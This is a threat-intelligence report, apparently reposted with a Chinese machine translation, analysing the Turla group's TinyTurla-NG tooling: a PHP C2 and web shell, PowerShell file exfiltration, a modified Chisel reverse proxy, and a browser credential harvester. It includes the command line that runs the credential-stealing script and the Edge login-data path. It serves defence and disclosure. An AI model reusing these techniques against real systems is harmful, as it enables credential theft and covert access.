Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.
思科 Talos,与 CERT.非政府组织发现了 Turla APT 使用的新恶意组件。Talos 的新发现说明了部署在我们之前披露的受感染 WordPress 服务器上的命令和控制 (C2) 脚本的内部工作原理。
- Talos also illustrates the post-compromise activity carried out by the operators of the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. We found three distinct sets of PowerShell commands issued to TTNG to enumerate, stage and exfiltrate files that the attackers found to be of interest.
Talos 还说明了 TinyTurla-NG (TTNG) 后门的操作员为向受感染的端点发出命令而进行的入侵后活动。我们发现向 TTNG 发出了三组不同的 PowerShell 命令,用于枚举、暂存和泄露攻击者发现感兴趣的文件。 - Talos has also discovered the use of another three malicious modules deployed via the initial implant, TinyTurla-NG, to maintain access, and carry out arbitrary command execution and credential harvesting.
Talos 还发现,通过初始植入程序 TinyTurla-NG 部署了另外三个恶意模块来维持访问,并执行任意命令执行和凭据收集。 - One of these components is a modified agent/client from Chisel, an open-sourced attack framework, used to communicate with a separate C2 server to execute arbitrary commands on the infected systems.
其中一个组件是来自 Chisel 的修改代理/客户端,Chisel 是一个开源攻击框架,用于与单独的 C2 服务器通信,以在受感染的系统上执行任意命令。 - Certificate analysis of the Chisel client used in this campaign indicates that another modified chisel implant has likely been created that uses a similar yet distinct certificate. This assessment is in line with Turla’s usage of multiple variants of malware families including TinyTurla-NG, TurlaPower-NG and other PowerShell-based scripts during this campaign.
对本活动中使用的凿子客户端的证书分析表明,可能已经创建了另一个改良的凿子植入物,该植入物使用类似但不同的证书。此评估符合 Turla 在本次活动期间使用恶意软件系列的多种变体,包括 TinyTurla-NG、TurlaPower-NG 和其他基于 PowerShell 的脚本。
Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT in the compromise we’ve previously disclosed. The continued investigation also revealed details of the inner workings of the C2 scripts including handling of incoming requests and a WebShell component that allows the operators to administer the compromised C2 servers remotely.
Talos,与 CERT.NGO 在我们之前披露的妥协中发现了 Turla APT 使用的新恶意组件。持续的调查还揭示了 C2 脚本内部工作的细节,包括处理传入请求和允许操作员远程管理受感染的 C2 服务器的 WebShell 组件。
C2 server analysis C2 服务器分析
The command and control (C2) code is a PHP-based script that serves two purposes: It’s a handler for the TinyTurla-NG implants and web shell that the Turla operators can use to execute commands on the compromised C2 server. The C2 scripts obtained by Talos are complementary to the TinyTurla-NG (TTNG) and TurlaPower-NG implants and are meant to deliver executables and administrative commands to execute on infected systems.
命令和控制 (C2) 代码是一个基于 PHP 的脚本,有两个用途:它是 TinyTurla-NG 植入程序和 Web shell 的处理程序,Turla 操作员可以使用它在受感染的 C2 服务器上执行命令。Talos 获得的 C2 脚本是对 TinyTurla-NG (TTNG) 和 TurlaPower-NG 植入程序的补充,旨在提供可在受感染的系统上执行的可执行文件和管理命令。
On load, the PHP-based C2 script will perform multiple actions to create the file structure used to serve the TTNG backdoor. After receiving a request, the C2 script first checks if the logging directory exists, if not, it will create one. Next, the script checks for a specific COOKIE ID. If it exists and corresponds to the hardcoded value, then the C2 script will act as a web shell.
加载时,基于 PHP 的 C2 脚本将执行多个操作来创建用于为 TTNG 后门提供服务的文件结构。收到请求后,C2 脚本首先检查日志记录目录是否存在,如果没有,它将创建一个。接下来,脚本将检查特定的 COOKIE ID。如果它存在并且对应于硬编码值,则 C2 脚本将充当 Web shell。
It will base64 decode the value of the $_COOKIE (not to be confused with the authentication COOKIE ID) entry and execute it on the C2 server as a command. These commands are either run using the exec(), passthru(), system(), or shell_exec() functions. It will also check if the variable specified is a resource and read its contents. Once the actions are complete, the output or resource is sent to the requestor and the PHP script will stop executing.
它将对 $_COOKIE(不要与身份验证 COOKIE ID 混淆)条目的值进行 base64 解码,并将其作为命令在 C2 服务器上执行。这些命令使用 exec()、passthru()、system() 或 shell_exec() 函数运行。它还将检查指定的变量是否为资源并读取其内容。操作完成后,输出或资源将发送给请求者,PHP 脚本将停止执行。
If there is an “id” provided in the HTTP request to the C2 server, the script will treat this as communication with an implant, such as TTNG or TurlaPower-NG. The “id” parameter is the same variable that is passed by the TTNG and TurlaPower-NG implants during communication with the C2 and creates the logging directory on the C2 server, as well. Depending on the next form value accompanying the “id”, the C2 will perform the following actions:
如果在对 C2 服务器的 HTTP 请求中提供了“id”,则脚本会将其视为与植入物(如 TTNG 或 TurlaPower-NG)的通信。“id”参数与TTNG和TurlaPower-NG植入物在与C2通信期间传递的变量相同,并在C2服务器上创建日志记录目录。根据“id”附带的下一个表单值,C2 将执行以下操作:
- “task“: Write the content sent by the requestor to the “<id>/tasks.txt” file and record the requestor’s IP address and timestamp in the “<id>/_log.txt”. The contents of this file are then sent to the requestor in response to the “gettask” request. Adversaries use this mechanism to add more tasks to the list of tasks/commands that each C2 must send to their backdoor installations to execute on the infected endpoints.
“task”:将请求者发送的内容写入“/tasks.txt”文件,并在“/_log.txt”中记录请求者的IP地址和时间戳。然后,此文件的内容将发送给请求者以响应“gettask”请求。攻击者使用此机制将更多任务添加到每个 C2 必须发送到其后门安装的任务/命令列表中,以便在受感染的端点上执行。 - “gettask“: Send the contents of the “<id>/tasks.txt” file to the infected system requesting a new command to execute on the infected endpoint.
“gettask”:将“/tasks.txt”文件的内容发送到受感染的系统,请求在受感染的端点上执行新命令。 - “result“: Get the content of the HTTP(S) form and record it into the “<id>/result.txt” file. The C2 uses this mechanism to obtain and record the output of a command executed on an infected endpoint by the TTNG backdoor into a file on disk.
“result”:获取 HTTP(S) 表单的内容并记录到“/result.txt”文件中。C2 使用此机制获取 TTNG 后门在受感染端点上执行的命令的输出,并将其记录到磁盘上的文件中。 - “getresult“: Get the contents of the “<id>/result.txt” file from the C2 server. The adversaries use this to obtain the results of a command executed on the infected endpoint without having to access the C2 server.
“getresult”:从 C2 服务器获取“/result.txt”文件的内容。攻击者使用它来获取在受感染的端点上执行的命令的结果,而无需访问 C2 服务器。 - “file” + “name“: Save the contents of the file sent to the C2 server either in full or part to a file specified on the C2 server with the same “name” specified in the HTTP form.
“file” + “name”:将发送到 C2 服务器的文件内容全部或部分保存到 C2 服务器上指定的文件中,并使用 HTTP 表单中指定的相同“名称”。 - “cat_file“: Read the contents of a file specified by the requestor on the C2 server and respond with the contents.
“cat_file”:读取请求者在 C2 服务器上指定的文件的内容,并使用内容进行响应。 - “rm_file“: Remove/delete a file specified by the requestor from the C2 server.
“rm_file”:从 C2 服务器中移除/删除请求者指定的文件。
The HTTP form values accepted by the C2 server task
, cat_file
, rm_file
, get_result
and their corresponding operations on the C2 server indicate that these are part of an operational apparatus that allows the threat actors to feed the C2 server new commands and retrieve valuable information collected by the C2 server, from a remote location, without having to log into the C2 itself. Operationally, this is a tactic that is beneficial to the threat actors considering that all C2 servers discovered so far are websites compromised by the threat actor instead of being attacker-owned. Therefore, it would be beneficial for Turla’s operators to simply communicate over HTTPS masquerading as legitimate traffic instead of re-exploiting or accessing the servers through other means such as SSH thereby increasing their fingerprint on the compromised C2 servers.
C2 服务器 task
接受的 HTTP 表单值 、 cat_file
、 rm_file
get_result
及其在 C2 服务器上的相应操作表明,这些是操作设备的一部分,允许威胁参与者从远程位置向 C2 服务器提供新命令并检索 C2 服务器收集的有价值信息,而无需登录 C2 本身。从操作上讲,这是一种对威胁参与者有利的策略,因为到目前为止发现的所有 C2 服务器都是被威胁参与者入侵的网站,而不是攻击者拥有的网站。因此,对于Turla的运营商来说,简单地通过伪装成合法流量的HTTPS进行通信,而不是通过SSH等其他方式重新利用或访问服务器,从而增加他们在受感染的C2服务器上的指纹。
This tactic can be visualized as:
这种策略可以可视化为:
Instrumenting TinyTurla-NG to carry out post-compromise activity
检测 TinyTurla-NG 以执行入侵后活动
The adversaries use TinyTurla-NG to perform additional reconnaissance to enumerate files of interest on the infected endpoints and then exfiltrate these files. They issued three distinct sets of modular PowerShell commands to TTNG:
攻击者使用 TinyTurla-NG 执行额外的侦测,以枚举受感染端点上感兴趣的文件,然后泄露这些文件。他们向 TTNG 发出了三组不同的模块化 PowerShell 命令:
- Reconnaissance commands: Used to enumerate files in a directory specified by the operator. The directory listing is returned to the operator to select interesting files that can be exfiltrated.
侦测命令:用于枚举操作员指定的目录中的文件。目录列表将返回给操作员,以选择可以泄露的有趣文件。
PowerShell script/Command enumerates files in four locations specified by the C2 and sends the results back to it.
PowerShell 脚本/命令枚举 C2 指定的四个位置中的文件,并将结果发送回 C2。
- Copy file commands: Base64-encoded commands/scripts issued to the infected systems to copy over files of interest from their original location to a temporary directory, usually: C:\windows\temp\
复制文件命令:向受感染系统发出的 Base64 编码命令/脚本,用于将感兴趣的文件从其原始位置复制到临时目录,通常为:C:\windows\temp\
- Exfiltration commands/scripts aka TurlaPower-NG: These scripts were used to finally exfiltrate the selected files to the C2 servers.
外泄命令/脚本(又名 TurlaPower-NG):这些脚本用于最终将所选文件泄露到 C2 服务器。
The scripts used during enumeration, copying and exfiltration tasks contain hardcoded paths for files and folders of interest to Turla. These locations consisted of files and documents that were used and maintained by Polish NGOs to conduct their day-to-day operations. The actors also used these scripts to exfiltrate Firefox profile data, reinforcing our assessment that Turla made attempts to harvest credentials, along with data exfiltration.
枚举、复制和外泄任务期间使用的脚本包含 Turla 感兴趣的文件和文件夹的硬编码路径。这些地点包括波兰非政府组织为开展日常业务而使用和维护的文件和文件。攻击者还使用这些脚本来泄露 Firefox 配置文件数据,这加强了我们对 Turla 试图收集凭据以及数据泄露的评估。
While Tinyturla-NG itself is enough to perform a variety of unauthorized actions on the infected system using a combination of scripts described above, the attackers chose to deploy three more tools to aid in their malicious operations:
虽然 Tinyturla-NG 本身足以使用上述脚本组合在受感染的系统上执行各种未经授权的操作,但攻击者选择部署另外三种工具来帮助其恶意操作:
- Chisel: Modified copy of the Chisel client/agent.
凿子:凿子客户端/代理的修改副本。 - Credential harvesting scripts: PowerShell-based scripts for harvesting Google Chrome or Microsoft Edge’s saved login data.
凭据收集脚本:基于 PowerShell 的脚本,用于收集 Google Chrome 或 Microsoft Edge 保存的登录数据。 - Tool for executing commands with elevated privileges: A binary that is meant to impersonate privilege levels of a specified process while executing arbitrary commands specified by the parent process.
用于执行具有提升权限的命令的工具:用于模拟指定进程的权限级别的二进制文件,同时执行父进程指定的任意命令。
The overall infection activity once TTNG has been deployed looks like this:
部署 TTNG 后的整体感染活动如下所示:
Using Chisel as another means of persistent access
使用 Chisel 作为另一种持久访问方式
Talos’ investigation uncovered that apart from TurlaPower-NG, the PowerShell-based file exfiltrator, the adversary also deployed another implant on infected systems. It’s a modified copy of the GoLang-based, open-source tunneling tool Chisel stored in the location: C:\Windows\System32\TrustedWorker[.]exe
Talos 的调查发现,除了基于 PowerShell 的文件泄露器 TurlaPower-NG 外,攻击者还在受感染的系统上部署了另一个植入物。它是基于 GoLang 的开源隧道工具 Chisel 的修改副本,存储在以下位置:C:\Windows\System32\TrustedWorker[.]exe文件
The modified Chisel malware is UPX compressed, as is common for Go binaries, and contains the C2 URL, port and communication certificate, and private keys embedded in the malware sample. Once it decrypts these artifacts, it continues to create a reverse SOCKS proxy connection to the C2 using the configuration: R:5000:socks
修改后的 Chisel 恶意软件经过 UPX 压缩,这在 Go 二进制文件中很常见,并且包含恶意软件示例中嵌入的 C2 URL、端口和通信证书以及私钥。解密这些工件后,它将继续使用以下配置创建与 C2 的反向 SOCKS 代理连接:R:5000:socks
In the proxy: 在代理中:
- “R”: Stands for remote port forwarding.
“R”:代表远程端口转发。 - “5000”: This is the port on the attacker machine that receives the connection from the infected system.
“5000”:这是攻击者计算机上接收来自受感染系统的连接的端口。 - “socks”: Specifies the usage of the SOCKS protocol.
“socks”:指定 SOCKS 协议的用法。
(The default local host and port for a socks remote in Chisel is 127[.]0[.]0[.]1:1080.)
(Chisel 中袜子遥控器的默认本地主机和端口是 127[.]0[.]0[.]1:1080.)
The C2 server that the chisel sample contacts is: 91[.]193[.]18[.]120:443.
凿子样品接触的 C2 服务器为:91[.]193[.]18[.]120:443.
The TLS configuration consists of a client TLS certificate and key pair. The certificate is valid between Dec. 7, 2023 and Dec. 16, 2024. This validity falls in line with Talos’ assessment that the campaign began in December 2023. The issuer of the certificate is named “dropher[.]com” and the subject name is “blum[.]com”.
TLS 配置由客户端 TLS 证书和密钥对组成。该证书的有效期为 2023 年 12 月 7 日至 2024 年 12 月 16 日。这一有效性符合 Talos 的评估,即该活动于 2023 年 12 月开始。证书的颁发者名为“dropher[.]com“,主题名称为”blum[.]com”。
During our data analysis, we found another certificate which we assessed with high confidence was also generated by Turla operators, but it’s unclear if this was a mistake or if they intended for the certificate to be used on another modified chisel implant.
在我们的数据分析过程中,我们发现另一个我们以高置信度评估的证书也是由 Turla 操作员生成的,但目前尚不清楚这是否是一个错误,或者他们是否打算将该证书用于另一个改良的凿子植入物。
The new certificate has the same issuer but in this case, the common name is blum[.]com and the serial number is 0x1000. This certificate was generated one second before the one used in the modified chisel client/agent.
新证书具有相同的颁发者,但在本例中,公用名是 blum[.]com 和序列号为 0x1000。此证书是在修改后的凿子客户端/代理中使用的证书之前一秒生成的。
Additional tools for elevated process execution and credential harvesting
用于提升流程执行和凭据收集的其他工具
Turla also deployed two more tools to aid their malicious operations on the infected systems. One is used to run arbitrary commands on the system and the other is used to steal Microsoft Edge browser’s login data.
Turla 还部署了另外两个工具来帮助他们在受感染的系统上进行恶意操作。一个用于在系统上运行任意命令,另一个用于窃取 Microsoft Edge 浏览器的登录数据。
The first tool is a small and simple Windows executable to create a new command line process on the system by impersonating the privilege level of another existing process. The tool will accept a target Process Identifier (PID) representing the process whose privilege level is to be impersonated and the command line that needs to be executed. Then, a new cmd[.]exe is spawned and used to execute arbitrary commands on the infected endpoint. The binary was compiled in early 2022 and was likely used in previous campaigns by Turla.
第一个工具是一个小型而简单的 Windows 可执行文件,用于通过模拟另一个现有进程的权限级别在系统上创建新的命令行进程。该工具将接受目标进程标识符 (PID),该标识符表示要模拟其权限级别的进程和需要执行的命令行。然后,一个新的 cmd[.]exe 生成并用于在受感染的端点上执行任意命令。该二进制文件是在 2022 年初编译的,很可能被 Turla 用于之前的竞选活动。
The second tool discovered by Talos is a PowerShell script residing at the location:
Talos 发现的第二个工具是驻留在该位置的 PowerShell 脚本:
C:\windows\system32\edgeparser.ps1
This script is used to find login data from Microsoft Edge located at:
此脚本用于从位于以下位置的 Microsoft Edge 查找登录数据:
%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
This data file and the corresponding decryption key for the login data extracted from the endpoint is archived into a ZIP file and stored in the directory: C:\windows\temp\<filename>.zip
此数据文件和从端点提取的登录数据的相应解密密钥将存档到 ZIP 文件中,并存储在以下目录中:C:\windows\temp\.zip
The script can be used to obtain credentials for Google Chrome as well but has been modified to parse login data from:
该脚本也可用于获取 Google Chrome 的凭据,但已修改为解析来自以下位置的登录数据:
%userprofile%\AppData\Local\Microsoft\Edge
TTNG uses the privilege elevation tool to run the PowerShell script using the command:
TTNG 使用特权提升工具通过以下命令运行 PowerShell 脚本:
"C:\Windows\System32\i.exe" _PID_ "powershell -f C:\Windows\System32\edgeparser.ps1"
This results in the tool spawning a new process with the command line:
这会导致该工具使用命令行生成一个新进程:
C:\Windows\System32\cmd.exe /c "powershell -f C:\Windows\System32\edgeparser.ps1"
Coverage 覆盖
Ways our customers can detect and block this threat are listed below.
下面列出了我们的客户检测和阻止此威胁的方法。
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
思科安全终端(以前称为面向终端的AMP)非常适合防止本文中详述的恶意软件的执行。 在此处免费试用安全终端。
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
思科安全 Web 设备 Web 扫描可防止访问恶意网站并检测这些攻击中使用的恶意软件。
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
思科安全邮件(以前称为思科邮件安全)可以阻止威胁行为者在其活动中发送的恶意电子邮件。您可以在此处免费试用 Secure Email。
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
思科安全防火墙(以前称为下一代防火墙和 Firepower NGFW)设备(如 Threat Defense Virtual、自适应安全设备和 Meraki MX)可以检测与此威胁相关的恶意活动。
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
思科安全恶意软件分析(威胁网格)可识别恶意二进制文件,并在所有思科安全产品中构建保护功能。
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Umbrella 是思科的安全互联网网关 (SIG),可阻止用户连接到恶意域、IP 和 URL,无论用户是在公司网络上还是在公司网络外。在此处注册 Umbrella 的免费试用版。
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
思科安全 Web 设备(以前称为网络安全设备)会自动阻止具有潜在危险的站点,并在用户访问可疑站点之前对其进行测试。
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
防火墙管理中心提供针对特定环境和威胁数据的上下文的其他保护。
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Cisco Duo 为用户提供多重身份验证,以确保只有经过授权的用户才能访问您的网络。
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
开源 Snort 订阅者规则集客户可以通过下载可在 Snort.org 上购买的最新规则包来了解最新信息。
IOCs 国际奥委会
IOCs for this research can also be found in our GitHub repository here.
这项研究的 IOC 也可以在我们的 GitHub 存储库中找到。
Hashes 散 列
267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b
d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40
ad4d196b3d85d982343f32d52bffc6ebfeec7bf30553fa441fd7c3ae495075fc
13c017cb706ef869c061078048e550dba1613c0f2e8f2e409d97a1c0d9949346
b376a3a6bae73840e70b2fa3df99d881def9250b42b6b8b0458d0445ddfbc044
Domains 域
hanagram[.]jp 花格[.]太平绅士
thefinetreats[.]com
caduff-sa[.]ch caduff-sa[.]中文
jeepcarlease[.]com 吉普车[.]com
buy-new-car[.]com 买新车[.]com
carleasingguru[.]com 卡莱辛古鲁[.]com
IP Addresses IP 地址
91[.]193[.]18[.]120
原文始发于Asheer Malhotra, Holger Unterbrink, Vitor Ventura, Arnaud Zobec:TinyTurla-NG in-depth tooling and command and control analysis
转载请注明:TinyTurla-NG in-depth tooling and command and control analysis | CTF导航